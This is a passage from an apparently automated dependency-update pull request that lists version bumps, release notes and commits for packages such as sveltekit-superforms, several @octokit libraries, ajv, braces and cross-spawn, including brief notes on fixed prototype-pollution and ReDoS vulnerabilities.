Valibot.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.26.1\u003c/h2\u003e\n\u003ch3\u003eRemoved\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eThe SuperDebug rune version broke Svelte 4 compatibility, so it has been removed until a solution can be figured out, hopefully very soon.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eZod 4 adapter now handles top-level discriminated unions.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.26.0\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://zod.dev/\"\u003eZod 4\u003c/a\u003e adapter added! Adapter names are \u003ccode\u003ezod4\u003c/code\u003e and \u003ccode\u003ezod4Client\u003c/code\u003e, works with both the full version and Zod Mini. As Zod is now using its own JSON Schema representation, and there are some breaking changes like how enums are handled, check migrations carefully and please \u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/issues\"\u003ereport any bugs\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://superforms.rocks/concepts/tainted\"\u003etaintedMessage\u003c/a\u003e now passes \u003ccode\u003eBeforeNavigate\u003c/code\u003e to its callback function.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://superforms.rocks/super-debug\"\u003eSuperDebug\u003c/a\u003e now has a Runes version, see the docs for how to import it.\u003c/li\u003e\n\u003cli\u003eAdded config options to \u003ccode\u003evalibotClient\u003c/code\u003e, same as in the \u003ccode\u003evalibot\u003c/code\u003e adapter.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/blob/main/CHANGELOG.md\"\u003esveltekit-superforms's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[2.27.4] - 2025-10-14\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed prototype pollution when using \u003ccode\u003edataType: 'json'\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[2.27.2] - 2025-10-03\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDevalue version bumped to avoid \u003ca href=\"https://github.com/sveltejs/devalue/security/advisories/GHSA-vj54-72f3-p5jv\"\u003eprototype pollution\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eZod 4 tests working.\u003c/li\u003e\n\u003cli\u003eZod 4 adapter didn't use the correct JSON Schema format for dates.\u003c/li\u003e\n\u003cli\u003eNested data traversal for correcting invalid types didn't stop at a valid value, replacing paths with default data further down the tree.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[2.27.1] - 2025-06-27\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed client validation issue with rapid multiple blur events.\u003c/li\u003e\n\u003cli\u003eArktype adapter improved.\u003c/li\u003e\n\u003cli\u003eUnion schemas now works with default values, replacing invalid properties even if nested.\u003c/li\u003e\n\u003cli\u003eWhen using \u003ccode\u003e{ taint: 'untaint-form' }\u003c/code\u003e option, form wasn't untainted unless it was modified.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[2.27.0] - 2025-06-16\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ca href=\"https://arktype.io/\"\u003eArktype\u003c/a\u003e adapter is finally a \u0026quot;full\u0026quot; adapter, meaning it's retrospectable and doesn't require default values anymore!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSuperDebug rune version is back, can now be imported as \u003ccode\u003eimport SuperDebug from 'sveltekit-superforms/SuperDebug.svelte';\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFixed \u003ccode\u003ebigint\u003c/code\u003e handling for Zod 4 and Valibot.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[2.26.1] - 2025-06-05\u003c/h2\u003e\n\u003ch3\u003eRemoved\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eThe SuperDebug rune version broke Svelte 4 compatibility, so it has been removed until a solution can be figured out, hopefully very soon.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eZod 4 adapter now handles top-level discriminated unions.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[2.26.0] - 2025-06-04\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/commit/34f1abf0c8992213c9bcc571c1f13e09b539db71\"\u003e\u003ccode\u003e34f1abf\u003c/code\u003e\u003c/a\u003e 2.27.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/commit/4a1310dd1a94176bb22036662c530dad48059ca4\"\u003e\u003ccode\u003e4a1310d\u003c/code\u003e\u003c/a\u003e Fixed prototype pollution when using dataType: 'json'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/commit/58faeb9f7d9b73d8f9724a92519e6bb55a07f4ee\"\u003e\u003ccode\u003e58faeb9\u003c/code\u003e\u003c/a\u003e 2.27.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/commit/fe94fa8f37d4ef11f49b1c79809a763123af5a7d\"\u003e\u003ccode\u003efe94fa8\u003c/code\u003e\u003c/a\u003e Fixed prototype pollution when using dataType: 'json'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/commit/0880f91fef0473ead2a4a690699860bf8847ee5d\"\u003e\u003ccode\u003e0880f91\u003c/code\u003e\u003c/a\u003e Type check in tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/commit/1576ab4f1667557deba6853d6c7bca362444601a\"\u003e\u003ccode\u003e1576ab4\u003c/code\u003e\u003c/a\u003e More svelte compiler fixes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/commit/49bb41323ba437ebb3aaaeb1db7615fefa995ebe\"\u003e\u003ccode\u003e49bb413\u003c/code\u003e\u003c/a\u003e Linter fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/commit/a2923221e3cadaa92ec8fcace5ce2715eb3af7e5\"\u003e\u003ccode\u003ea292322\u003c/code\u003e\u003c/a\u003e Turned off new svelte eslint rule\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/commit/e77f33c23ed9ad11f01ee787dd086e9d296f5355\"\u003e\u003ccode\u003ee77f33c\u003c/code\u003e\u003c/a\u003e Removed debug output from tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/commit/22689d4e13e6e85f51bf2581ec380acbc8ff67ea\"\u003e\u003ccode\u003e22689d4\u003c/code\u003e\u003c/a\u003e 2.27.2\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ciscoheat/sveltekit-superforms/compare/v1.13.4...v2.27.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/endpoint` from 9.0.5 to 9.0.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/endpoint.js/releases\"\u003e\u003ccode\u003e@​octokit/endpoint\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev9.0.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/endpoint.js/compare/v9.0.5...v9.0.6\"\u003e9.0.6\u003c/a\u003e (2025-02-14)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/endpoint.js/issues/515\"\u003e#515\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/endpoint.js/commit/599ff4f76534ea2872f40b41c4ffbbcca987d6a5\"\u003e599ff4f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/endpoint.js/commit/599ff4f76534ea2872f40b41c4ffbbcca987d6a5\"\u003e\u003ccode\u003e599ff4f\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/endpoint.js/issues/515\"\u003e#515\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/endpoint.js/compare/v9.0.5...v9.0.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 9.2.1 to 9.2.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev9.2.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003e9.2.2\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003ee1e4489\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003e\u003ccode\u003ee1e4489\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request-error` from 5.1.0 to 5.1.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request-error.js/releases\"\u003e\u003ccode\u003e@​octokit/request-error\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.1.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v5.1.0...v5.1.1\"\u003e5.1.1\u003c/a\u003e (2025-02-14)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/dayshift\"\u003e\u003ccode\u003e@​dayshift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://github.com/octokit/request-error.js/commit/12a14f03dbfbbdc759c1c20a631b277892da09de\"\u003e12a14f0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/b51ed2766807a5ca59b5ba477762e84171ccca53\"\u003e\u003ccode\u003eb51ed27\u003c/code\u003e\u003c/a\u003e test: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/dayshift\"\u003e\u003ccode\u003e@​dayshift\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/12a14f03dbfbbdc759c1c20a631b277892da09de\"\u003e\u003ccode\u003e12a14f0\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/dayshift\"\u003e\u003ccode\u003e@​dayshift\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/request-error.js/compare/v5.1.0...v5.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 8.3.1 to 8.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e\u003ccode\u003e@​octokit/request\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev8.4.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v8.4.0...v8.4.1\"\u003e8.4.1\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/741\"\u003e#741\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/356411e3217019aa9fc8a68f4236af82490873c2\"\u003e356411e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.4.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v8.3.1...v8.4.0\"\u003e8.4.0\u003c/a\u003e (2024-04-09)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ere-add \u003ccode\u003eredirect\u003c/code\u003e request option (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/636\"\u003e#636\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/abc4955217d7626200844b75321be3ac73ef95f6\"\u003eabc4955\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/octokit/request.js/issues/599\"\u003e#599\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/356411e3217019aa9fc8a68f4236af82490873c2\"\u003e\u003ccode\u003e356411e\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/741\"\u003e#741\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/abc4955217d7626200844b75321be3ac73ef95f6\"\u003e\u003ccode\u003eabc4955\u003c/code\u003e\u003c/a\u003e feat: re-add \u003ccode\u003eredirect\u003c/code\u003e request option (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/636\"\u003e#636\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/request.js/compare/v8.3.1...v8.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ajv` from 6.12.6 to 6.14.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/e3af0a723b4b7ad86eff43be355c706d31e0e915\"\u003e\u003ccode\u003ee3af0a7\u003c/code\u003e\u003c/a\u003e 6.14.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/b552ed66191eb338498df3196065c777e3bb71f2\"\u003e\u003ccode\u003eb552ed6\u003c/code\u003e\u003c/a\u003e add regExp option to address $data exploit via a regular expression (CVE-2025...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/72f228665859eed5e2be3a66f8c4a7aff6b34dcf\"\u003e\u003ccode\u003e72f2286\u003c/code\u003e\u003c/a\u003e docs: update v7 info\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/231e52b3bca62559202b95e5fb5cee02145b226a\"\u003e\u003ccode\u003e231e52b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/ajv-validator/ajv/issues/1320\"\u003e#1320\u003c/a\u003e from philsturgeon/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/d3475fc20416c33fe030c8aa3b09fa411f325bbd\"\u003e\u003ccode\u003ed3475fc\u003c/code\u003e\u003c/a\u003e Add spectral, an AJV util from a sponsor\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/413afe01f518ea74d1740a7cb211df787c585544\"\u003e\u003ccode\u003e413afe0\u003c/code\u003e\u003c/a\u003e docs: v7.0.0-beta.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/11e997bda2f3eecb445c1e5a07d96ef7e81c5f5d\"\u003e\u003ccode\u003e11e997b\u003c/code\u003e\u003c/a\u003e update readme for v7\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/ajv-validator/ajv/compare/v6.12.6...v6.14.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 1.1.11 to 1.1.12\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.12\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `braces` from 3.0.2 to 3.0.3\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/74b2db2938fad48a2ea54a9c8bf27a37a62c350d\"\u003e\u003ccode\u003e74b2db2\u003c/code\u003e\u003c/a\u003e 3.0.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/88f1429a0f47e1dd3813de35211fc97ffda27f9e\"\u003e\u003ccode\u003e88f1429\u003c/code\u003e\u003c/a\u003e update eslint. lint, fix unit tests.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/415d660c3002d1ab7e63dbf490c9851da80596ff\"\u003e\u003ccode\u003e415d660\u003c/code\u003e\u003c/a\u003e Snyk js braces 6838727 (\u003ca href=\"https://redirect.github.com/micromatch/braces/issues/40\"\u003e#40\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/190510f79db1adf21d92798b0bb6fccc1f72c9d6\"\u003e\u003ccode\u003e190510f\u003c/code\u003e\u003c/a\u003e fix tests, skip 1 test in test/braces.expand\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/716eb9f12d820b145a831ad678618731927e8856\"\u003e\u003ccode\u003e716eb9f\u003c/code\u003e\u003c/a\u003e readme bump\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/a5851e57f45c3431a94d83fc565754bc10f5bbc3\"\u003e\u003ccode\u003ea5851e5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/braces/issues/37\"\u003e#37\u003c/a\u003e from coderaiser/fix/vulnerability\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/2092bd1fb108d2c59bd62e243b70ad98db961538\"\u003e\u003ccode\u003e2092bd1\u003c/code\u003e\u003c/a\u003e feature: braces: add maxSymbols (\u003ca href=\"https://github.com/micromatch/braces/issues/\"\u003ehttps://github.com/micromatch/braces/issues/\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/9f5b4cf47329351bcb64287223ffb6ecc9a5e6d3\"\u003e\u003ccode\u003e9f5b4cf\u003c/code\u003e\u003c/a\u003e fix: vulnerability (\u003ca href=\"https://security.snyk.io/vuln/SNYK-JS-BRACES-6838727\"\u003ehttps://security.snyk.io/vuln/SNYK-JS-BRACES-6838727\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/98414f9f1fabe021736e26836d8306d5de747e0d\"\u003e\u003ccode\u003e98414f9\u003c/code\u003e\u003c/a\u003e remove funding file\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/665ab5d561c017a38ba7aafd92cc6655b91d8c14\"\u003e\u003ccode\u003e665ab5d\u003c/code\u003e\u003c/a\u003e update keepEscaping doc (\u003ca href=\"https://redirect.github.com/micromatch/braces/issues/27\"\u003e#27\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/micromatch/braces/compare/3.0.2...3.0.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cross-spawn` from 7.0.3 to 7.0.6\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/moxystudio/node-cross-spawn/blob/master/CHANGELOG.md\"\u003ecross-spawn's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.5...v7.0.6\"\u003e7.0.6\u003c/a\u003e (2024-11-18)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdate cross-spawn version to 7.0.5 in package-lock.json (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/f700743918d901eff92960e15a8dd68f87bd4176\"\u003ef700743\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.4...v7.0.5\"\u003e7.0.5\u003c/a\u003e (2024-11-07)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix escaping bug introduced by backtracking (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/640d391fde65388548601d95abedccc12943374f\"\u003e640d391\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.3...v7.0.4\"\u003e7.0.4\u003c/a\u003e (2024-11-07)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edisable regexp backtracking (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/160\"\u003e#160\u003c/a\u003e) (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/5ff3a07d9add449021d806e45c4168203aa833ff\"\u003e5ff3a07\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/77cd97f3ca7b62c904a63a698fc4a79bf41977d0\"\u003e\u003ccode\u003e77cd97f\u003c/code\u003e\u003c/a\u003e chore(release): 7.0.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/6717de49ff1e5de49622488dcb9c33fb25370c85\"\u003e\u003ccode\u003e6717de4\u003c/code\u003e\u003c/a\u003e chore: upgrade standard-version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/f700743918d901eff92960e15a8dd68f87bd4176\"\u003e\u003ccode\u003ef700743\u003c/code\u003e\u003c/a\u003e fix: update cross-spawn version to 7.0.5 in package-lock.json\u003c/li\u003e\n\u003cli\u003e\u003ca 